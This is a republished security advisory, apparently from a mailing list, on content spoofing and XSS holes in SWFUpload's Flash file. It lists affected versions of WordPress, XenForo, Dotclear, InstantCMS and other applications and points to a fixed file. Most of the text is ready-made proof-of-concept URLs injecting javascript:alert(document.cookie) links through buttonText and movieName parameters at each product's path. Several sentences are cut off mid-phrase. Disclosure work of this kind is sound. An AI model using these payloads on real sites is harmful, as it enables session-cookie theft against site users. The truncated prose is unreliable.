来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] Hello list!Earlier Ive wrote about Content Spoofing and Cross-Site Scriptingvulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html). Thisis very popular flash-fi......
Hello list! Earlier I've wrote about Content Spoofing and Cross-Site Scripting Last year I've wrote about other XSS hole in SWFUpload and I mentioned that There are different names of files of SWFUpload: swfupload.swf, So from those web applications the next are vulnerable (plus many other web swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin, swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, swfupload_f11.swf - SentinelleOnAir. Also InfoGlue is vulnerable (about XSS vulnerability in ZeroClipboard.swf in ------------------------- Vulnerable are all web applications with SWFUpload (v2.2.0.1 and previous Vulnerable are versions WordPress 2.7 - 3.3.1 (which bundled with Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb, Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this ----- Use swfupload.swf from WordPress 3.3.2 and higher versions. All web ---------- There are two vulnerabilities in SWFUpload. Content Spoofing (WASC-12): http://site/swfupload.swf?buttonText=test%3Cimg%20src=http://up.2cto.com/2013/0314/20130314114320866.gif%27%3E It's possible to inject text, images and html (e.g. for link injection). Cross-Site Scripting (WASC-08): http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Code will execute after click. It's strictly social XSS. These are examples of XSS vulnerability in different web applications: WordPress: http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Dotclear: http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E XenForo: http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E InstantCMS: http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E AionWeb: http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Dolphin: http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E SwfUploadPanel for TYPO3 CMS: http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Archiv plugin for TinyMCE: http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Liferay Portal: http://www.2cto.com /html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Swfupload for Drupal: As it can be seen from the project http://site/js/libs/swfupload_f10.swf SWFUpload for Codeigniter: http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E SentinelleOnAir: http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E InfoGlue: Previous XSS vulnerabilities: http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// New XSS vulnerability: http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Best wishes & regards, |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com